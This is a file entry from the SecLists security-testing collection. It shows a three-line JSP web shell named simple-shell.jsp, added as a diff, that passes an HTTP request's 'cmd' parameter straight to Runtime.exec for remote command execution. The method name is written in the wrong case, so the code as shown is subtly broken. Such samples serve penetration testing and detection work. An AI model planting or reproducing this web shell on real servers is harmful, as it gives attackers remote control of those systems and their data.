SecLists/Web-Shells/JSP/simple-shell.jsp
2019-01-07 15:40:56 +00:00

3 lines
66 B
Text

+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>